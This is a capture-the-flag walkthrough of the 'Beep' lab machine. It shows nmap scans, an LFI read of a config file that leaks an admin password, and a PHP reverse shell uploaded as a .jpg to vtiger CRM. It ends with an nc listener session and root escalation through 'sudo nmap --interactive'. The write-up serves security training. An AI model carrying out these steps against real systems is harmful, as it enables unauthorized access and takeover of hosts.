-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Jan 10 22:36:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.7
Warning: 10.10.10.7 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.7
Host is up (0.063s latency).
Not shown: 65352 closed tcp ports (reset), 167 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
877/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
# Nmap done at Mon Jan 10 22:37:05 2022 -- 1 IP address (1 host up) scanned in 22.16 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Jan 10 22:38:04 2022 as: nmap -sCV -p22,25,80,110,111,143,443,877,993,995,3306,4190,4445,4559,5038,10000 -oN targeted 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL PIPELINING APOP IMPLEMENTATION(Cyrus POP3 server v2) STLS TOP USER LOGIN-DELAY(0) RESP-CODES EXPIRE(NEVER)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 874/udp status
|_ 100024 1 877/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: NO ATOMIC ID CATENATE LITERAL+ OK RENAME SORT=MODSEQ Completed IMAP4 THREAD=ORDEREDSUBJECT URLAUTHA0001 BINARY STARTTLS MULTIAPPEND CONDSTORE MAILBOX-REFERRALS QUOTA LIST-SUBSCRIBED UIDPLUS CHILDREN IDLE LISTEXT ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte SORT ACL X-NETSCAPE IMAP4rev1 UNSELECT NAMESPACE
443/tcp open ssl/https?
|_ssl-date: 2022-01-10T22:41:29+00:00; +1h00m00s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
877/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 22:44:34 2022 -- 1 IP address (1 host up) scanned in 390.13 seconds
So it looks like we have a lot of information, let's go step by step. We know there is an HTTP server running on port 80. Let's take a look at it with the whatweb tool.
If you append the LFI exploit path to https://10.10.10.7 , you should be able to get the /etc/amportal.con file. We also could see other interesting files sush as /etc/passwd.
It looks a bit messy. If we press Ctrl+U in order to view the source code, you should see the text a bit more organized.
And look at that! We got the user admin and the password jEhdIekWmdjE.
Exploitation
At this point, there are various ways to get a shell. From logging in via ssh, to doing a shellshock attack, to taking advantage of crontab tasks via webmin, and many more.
I will be exploiting the vtiger CRM.
Let's use gobuster to list directories on the website.
gobuster dir -u http://10.10.10.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -k
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
We get a lot of directories. If we go to the /vtigercrm directory, we should see another login page. Let's try the credentials we found earlier.
And we got in!
To spawn a reverse shell, we will have to go to Settings > Module Manager > Company Details.
Now we are going to create a PHP file that runs at a system level a command that sends our netcat listener a shell. Then we are going to rename the PHP file with the .jpg extension, so that the CRM will accept it. The file should look like this:
Then we upload the file into the Company Logo field.
Before hitting Save, we have to set out netcat listener.
nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Now, if we hit send, we should get the reverse shell as the user asterisk and we could grab the user flag.
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.7] 60860
bash: no job control in this shell
bash-3.2$ whoami
asterisk
cat /home/fanis/user.txt
cc9af475a7c3c3a9368515213aba4080
Privilege Escalation
Let's start the privilege escalation phase listing the sudo privileges of the asterisk user.
sudo -l
-l list user privileges.
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
So the user asterisk can run quite a few binaries as sudo.
GTFOBins is a great list of binaries that can be used to escalate privileges if you have the right permissions:
If we search for nmap in the GTFOBins list, we can see that we can spawn a shell as root with the sudo privilege running the following command:
sudo nmap --interactive
nmap> !/bin/bash
And that's right, we get a shell as the root user. All we have to do now is reap the harvest and grab the root flag.
